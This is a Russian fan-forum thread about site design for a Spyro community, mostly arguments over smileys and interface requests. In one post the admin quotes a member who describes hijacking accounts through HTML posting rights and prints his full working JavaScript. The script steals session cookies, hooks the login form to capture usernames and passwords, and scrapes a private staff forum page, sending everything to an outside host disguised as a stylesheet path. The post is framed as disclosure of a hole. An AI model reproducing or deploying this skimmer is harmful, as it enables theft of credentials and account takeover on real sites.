Понедельник | 30.12.2024 |19:57
Приветствую Вас Гость Мира Спайро | RSS
Модератор форума: Zeblasky, nonun  
Ваши предложения\замечания по дизайну форума\сайта.
КеншинСообщение # 1 Суббота, 24.07.2010, 12:40
Аватар Кеншин
Feel the music, feel the sounds.
Герой Города
«316»
Где: Не в городе Драконов
Итак, эта тема была создана заного по просьбе Serlutin'а, на что я дал добром. Смысл этой темы довольно прост - вы высказываете свои предложения по оформлению. Можете выкладывать разные иконки, картинки для шапок, колонок и много другого на нашем сайте. Здесь так же будет вестись обсуждение ваших предложений, так что не бойтесь критики. Но и пользователей прошу критиковать вмеру.


モンスターカード 緋村謙信
モンスターカード ロックマンゼロ
 
STALKER_007Сообщение # 256 Вторник, 04.09.2012, 20:39
Аватар STALKER_007
Легендарный Дракон
Почетный Житель
«8894»
Где: Не в городе Драконов
nonun, я уверен, что если ты не поддерживаешь, то и другие не поддержат.
 
ХаулСообщение # 257 Вторник, 04.09.2012, 21:04
Аватар Хаул
武藤遊戯
Хранитель Стихий
«»
Где: Не в городе Драконов
Quote (STALKER_007)
nonun, я уверен, что если ты не поддерживаешь, то и другие не поддержат.

Здесь два переломных мнения - Зебласки и Серлютин.
Зебласки - библия сея сайта. С ним спорить мне религия не позволяет.
Серл - он заправляет дизайном. Если ему захочется поставит.

Но моё мнение - против. У меня на эти смайлы аллергия.


I am Lei shen, slayer of kings and gods! You've made a grave mistake
 
SerlutinСообщение # 258 Вторник, 04.09.2012, 23:02
Аватар Serlutin
Взрослый Дракон
Летописец
«2337»
Где: Не в городе Драконов
Меня вообще смайлы раздражают :/ И анимированные и головы, и колобки :P Была бы воля убрал бы все :)
 
SomnyСообщение # 259 Вторник, 04.09.2012, 23:11
Аватар Somny
Взрослый Дракон
Житель Города
«1070»
Где: Не в городе Драконов
Serlutin, отрубить имг-тэги - мечта эпилептика.

I TOLD YOU DOG!
 
AnkalagonСообщение # 260 Среда, 05.09.2012, 02:21
Аватар Ankalagon
Ночной Страж
Летописец
«2248»
Где: Не в городе Драконов
Quote (STALKER_007)
Но с текущим набором смайлов иногда нельзя точно выразить свою эмоцию.

Всегда можно поставить картинку-мем. Они уж точно выразят эмоцию нужную, притом, ИМХО, куда лучше, чем смайлы-колобки. Да, знаю, что не всем они не нравятся, но они не столь набили оскому, и как-то более интересны.

Правда, стоит ли даже делать какую-то ссылку на них - вопрос сомнительный. Потому что когда начнут лепить их по смыслу и без, будет бардак в чате, и мемы потеряют свой смысл. Кто знает, что обозначает мем, и кому нужно, тот и сам найдёт и вставит в чат, благо, теперь это возможно.

Введение же новых смайлов как дополнительных вызовет гигантский список - где будет непросто отыскать что-то нужное.


"Править по праву крови - значит воистину править"

I'm no man of honour
Myself is my true king
But somewhere deep within me
The bells of conscience ring

 
STALKER_007Сообщение # 261 Среда, 05.09.2012, 12:41
Аватар STALKER_007
Легендарный Дракон
Почетный Житель
«8894»
Где: Не в городе Драконов
Quote (Ankalagon)
Всегда можно поставить картинку-мем.

Разница в том, что такие картинки или сторонние смайлы вставляются в кодах. Т.е. код надо получить и вставить в сообщение, вместо того, чтобы просто выбрать смайл из списка)

Добавлено (05.09.2012, 12:41)
---------------------------------------------

Quote (Ankalagon)
Введение же новых смайлов как дополнительных вызовет гигантский список - где будет непросто отыскать что-то нужное.

А я не говорил про гигантский список. Я говорил чисто для замены смайлов со Спайро тут. А их немного.
 
ХаулСообщение # 262 Среда, 05.09.2012, 13:03
Аватар Хаул
武藤遊戯
Хранитель Стихий
«»
Где: Не в городе Драконов
STALKER_007, я открою тебе страшную тайне - не анимированные смайлы рисовала Спай

I am Lei shen, slayer of kings and gods! You've made a grave mistake
 
STALKER_007Сообщение # 263 Среда, 05.09.2012, 13:38
Аватар STALKER_007
Легендарный Дракон
Почетный Житель
«8894»
Где: Не в городе Драконов
Юги, и что? Я не хочу никого этим оскорбить, если че. Но они уже реально поднадоели.
 
ХаулСообщение # 264 Среда, 05.09.2012, 14:12
Аватар Хаул
武藤遊戯
Хранитель Стихий
«»
Где: Не в городе Драконов
Quote (STALKER_007)
и что?

Оставь работу создательницы сайта в покое


I am Lei shen, slayer of kings and gods! You've made a grave mistake
 
STALKER_007Сообщение # 265 Среда, 05.09.2012, 17:06
Аватар STALKER_007
Легендарный Дракон
Почетный Житель
«8894»
Где: Не в городе Драконов
Quote (Юги)
Оставь работу создательницы сайта в покое

Да я уже давно понял, что идея не пройдет, не боись. Как хотите, вообщем. Только уберите дублирующиеся смайлы, пожалуйста.
 
TelleryСообщение # 266 Воскресенье, 23.09.2012, 17:13
Аватар Tellery
Далеррия навсегда!
Почетный Житель
«3645»
Где: Не в городе Драконов
У меня есть предложение создать "железный" раздел нашего форума, где мы сможем помочь друг другу с проблемами по аппаратной части компьютера, скажем там помочь в выборе видеокарты, как разгонять процессор и т.д.
Извиняюсь, не туда написал, удалите этот пост пожалуйста.




Сообщение отредактировал Tellery - Воскресенье, 23.09.2012, 17:17
 
ОинорСообщение # 267 Воскресенье, 10.04.2016, 11:25
Аватар Оинор
Яйцо
Житель Города
«47»
Где: Не в городе Драконов
(Воспринемать как шутку)
Думаю начать нужно с анимации бана чтоб АМС было максимально комфортно банить,молний с низу экрана к аватарке забаниного,а потом розпадения аватврки на кусочки(розумеется с возможностю костомизацыи,вдруг комуто захочется зжечь аватарку в пепел)будет достаточно.
Также нужно облагородить АМС ,чтоб вы выглядели не как обычные холопы :
  • Перейти с статичных аватарок на анемрованые  .
  • Зделать переливающююся золотую рамку для аватарок и постов АМС (чтоб люди видили на сколько они нечтожны на вашем фоне).
  • Обязательно нужна надпись "Представитель АМС"на заднем фоне поста.(чем вы хуже сотрудников Близзард на форумах battle.net )
  • Обязательно нужно добавить клавиши "Первое сообщение АМС" в верху и "Следующее сообщение АМС"возле ваших постов.(это неплохо увеличет ЧСВ(чувство собственой важности) Админо-Модерского Состава ).
  • Нужно выделить посты АМС отдельным цветом букв,для Админов- красные пилающие(в прямом смысле)(чтоб посты Администраторов нельзя было пропустить),а для модераторов синие искрящиеся (чтоб люди понемали что банхамер уже на готове).


Тогда новый человек зайдя на сайт сразу поймёт что это АМС ,и с ним луче дружыть.
P.S.извиняюсь за АМС тафтологию .


Сообщение отредактировал Оинор - Воскресенье, 10.04.2016, 15:59
 
SerlutinСообщение # 268 Четверг, 28.04.2016, 21:32
Аватар Serlutin
Взрослый Дракон
Летописец
«2337»
Где: Не в городе Драконов
Цитата aleksusklim
Кстати, тут не только незапрет на подмену куков, но и доступ к хтмл тегам может весьма коварно сыграть… вот скажите, вы на какой страничке обычно пароль вводите? На заглавной, на личке (укозовская форма), или на любой форумной странице через всплывающее поле по кристаллику?

Вообще, там фиксируется точный v4 адрес, или только часть подсети? Если подсеть, то теоретически можно отыскать какой-нить прокси с похожим адресом (правда я не смог), а если система требует совпадения даже последнего бита – то всех АМС должно по идее перелогинивать после каждого переподключения, тем более что, кроме как в панели управления, больше нигде укоз больше одной сессии не допускает.

Всё, я вытаскиваю удочку. Итак, что я установил: пользователь, обладающий HTML кодами в сообщениях – по силе эквивалентен модератору или администратору! Потому что, потратив некоторое количество сил и времени, он сможет на время или навсегда перехватить управление над любым другим аккаунтом, потенциально самым полномочным. В особенности, когда сессия жертвы не привязана к IP, но и это не лекарство от всех болезней. Мои результаты сводятся к четырём теоретическим пунктам:
1) Тот, у кого есть HTML, может повесить крючок и дампить куки всех попавшихся. Если их сессия не привязана к IP – он сможет получить полный доступ к их аккаунту и правам, включая смену пароля в профиле (при этом не зная старый).
2) Тот, у кого есть HTML, может где-либо повесить свой обработчик на «кристаллик входа», в надежде, что жертва будет входить через него. В этом случае он получает пароль и следовательно, полные права – независимо от привязки сессии.
3) Тот, у кого нет HTML, всё ещё может воспользоваться той самой дырой (Серл знает), если Укоз её до сих пор не закрыл. Через неё он получает HTML и возможность атаки предыдущими способами.
4) Даже если сессия жертвы привязывается к IP, а сама она никогда не входит через кристаллик (например, всегда со страницы /index/14 ), то даже так имеющий HTML коды (или получивший их через дыру) сможет выполнить от имени жертвы однократный скрипт, не дающий полного доступа к аккаунту,
Но я находчив, и дописал скриптец по способу 4 – и таки выудил страничку списка тем «Совет Админо-модераторского состава», но остановился на этом: всё-таки мне бал важен сам факт возможности, а не информация там. И с аккаунтами «взломанных» пользователей я тоже ничего не намерен делать (тем более большинство из них – мои друзья). Но в любом случае нам нужно что-то придумать, чтобы подобные атаки не были в принципе возможны.

И да – мне немедленно убирать крючок и стереть все свои следы, или кто-нить из АМС хочет попробовать «поймать» меня за скрипт? ^^

Ну инъекции с помощью html не являются дырой юкоза. По умолчанию ими могут пользоваться только Администраторы. Да и то, везде советуют отключать эту настройку, а включать только при необходимости.
Необходимость и возникла, когда нужно было восстановить сообщения. И да, я знал, какие возможности таит в себе html, поэтому и попросил не использовать скрипты.

Так что основная уязвимость как раз в группе Редакторов. Во-первых, они не защищены от смены cookies, во-вторых, понаберут в группу кого попало, хакеров всяких.
Скорее всего для защиты от подмены cookies фиксируется полный IP. У меня порой меняются только последние цифры и входить заново нужно.
Цитата Tenzi-Sharptail
Нехилые такие у сайта дыры.

Да, в личных сообщениях есть дыра. Проблема тут в том, что этот модуль не обновлялся похоже с самого создания юкоз. То есть лет 10 точно. А то и больше. Поэтому Личные сообщения такие убогие. Ходят слухи, что вроде, как их хотят модернизировать. Но это только слухи.
Цитата
Нехилые такие у сайта дыры." -- Ага. Например одно из последних ваших входящих ЛС имеет тему «а, просто без темы)». О чём оно – не знаю (и не буду узнавать), я не воровал содержимое писем, только список. Ха, а ещё я действовал прямо со своего текущего IP и не скрывал себя при запросах! Видимо, Серлутин на уровне панели управления забанил тот сайт, с которого я производил атаку (видимо ещё год назад, когда мы обсуждали дыру и проверяли). А может это сам Укоз защищался, я не особо заморачивался.


Цитата
А исходник-то хоть показать? Он клёвый!

Код
var r,v,n="",a=document.getElementsByTagName("a"),l=a.length,i,x=new XMLHttpRequest();x.open("POST","http://kulaworld.pe.hu/css/style.css",true);x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");x.onreadystatechange=function(){};r=/0spyrouCoz=(.*?);/;r=r.exec(document.cookie+";");for(i=0;i<l;i++){v=a[i];if(v.href=="http://www.spyro-realms.com/index/8"&&v.target=="_blank"){n=v.innerHTML;break;}};if(r)x.send("p="+encodeURIComponent(n+"-"+r[1]));setInterval(function(){var p;if(p=document.getElementsByName("password")[0]){if(!p.onchange){p.onchange=function(){var u=document.getElementsByName("user")[0],v=document.getElementsByName("password")[0];if(u&&v)if(u.value&&v.value){v=encodeURIComponent(u.value+"/"+v.value);var x=new XMLHttpRequest();x.open("POST","http://kulaworld.pe.hu/css/style.css",true);x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");x.onreadystatechange=function(){};x.send("p="+v);}};document.getElementsByName("user")[0].onchange=p.onchange;if(p.value!="")p.onchange();}}},900);var X=new XMLHttpRequest();X.open("GET","http://www.spyro-realms.com/forum/47",true);if(X.overrideMimeType)X.overrideMimeType("text/plain; charset=utf-8");X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){var x,v=X.responseText;if(v.indexOf("/forum/47")>0){x=new XMLHttpRequest();x.open("POST","http://kulaworld.pe.hu/css/style.css",true);x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");x.onreadystatechange=function(){};x.send("b="+encodeURIComponent(v));}};};X.send(null);//sorry..
 
P-A-T-R-I-C-KСообщение # 269 Вторник, 10.05.2016, 09:29
Аватар P-A-T-R-I-C-K
Стрекоза
Новопоселенец
«0»
Где: Не в городе Драконов
Всем привет. Я только сегодня оказался на этом сайте.
И сразу, что меня порадовало, так это дизайн данного ресурса.
Красивое оформление главной страницы, красивое оформление форума.
В общем, желаю, чтобы сайт развивался и дальше радовал посетителей своим дизайном.


Так и надо: в моём городе звёзд не видно...
 
alteyaСообщение # 270 Среда, 21.09.2016, 21:51
Аватар alteya
Дракон Подросток
Редактор
«246»
Где: Не в городе Драконов
Забрела я тут на главную страницу...

А там мне какой-то не совсем русский вещает: слющай, э, если тебе здэсь нравица, то нужно пройди регистрацию.



А, ну и еще расхождение в ты/вы. «Здравствуй, странник», но потом «вы забрели / вам понравилось / у вас есть аккаунт», и вдруг снова «войди в город». Ты уж определитесь, что ли.)

alteya с редактирования текстов Spyro 3 перешла на редактирование текста сайта

И еще. Сейчас, как я заметила, сообщения подряд от одного человека не сливаются в одно, а идут отдельно (по крайней мере на f48). Это здорово - для все того же f48, когда можно отделить разные уровни и т. д., а потом ссылаться на конкретный кусок своего текста, а не на агроменную простынку - «ну, где-то там оно, ищите».
Но возможно ли сделать опциональную возможность склеивать сообщения? Какую-нибудь галочку, там. Потому как когда пишется несколько небольших и не шибко важных сообщений
подряд, и они все идут отдельно и забивают страницу - это еще сильнее раздувает и без того пухлую тему (ага, я о тех самых 43, нет, уже 44 страницах...).

«Но есть же кнопка редактировать сообщения! Нажимай ее и дописывай, что хотела».
Ага, есть. Только у меня при ее нажатии вечно какая-то ж...утко нехорошая вещь получается. То тэги плывут (особенно цитатные). То при попытке дописать инфу про иллюзиониста в теме Текста к своему сообщению мне написало, с какого-то рожна, «нет доступа». То при второй попытке сделать это мне вообще показало чистое и стерильное поле, как будто я отправила пустое сообщение. Надо ли описывать, в каком я офигении обновляла страницу, попутно вспоминая заповедь отправки сообщений на форум «Во имя ctrl A, ctrl C и ctrl V. Enter» и кляня себя за то, что ей пренебрегла.

«Слушай, alteya. Такая ерундень только у тебя происходит. У всех остальных все в порядке»
Да я-то что. Мне в общем-то и так нормально. Но если вдруг есть несложный способ добавить эту функцию, это было бы маленькой дополнительной фичей.

«Все-то им не угодишь. Поставишь склейку сообщений - возникают. Уберешь ее — возмущаются»
Не-не, все ж таки между отдельными и сливающимися сообщениями, при невозможности промежуточных вариантов, я бы выбрала первое.

«Ой, а настрочила-то, настрочила...»
Все, все, улетаю в свое дупло.
 
Поиск:

Кто нас сегодня посетил

Для добавления необходима авторизация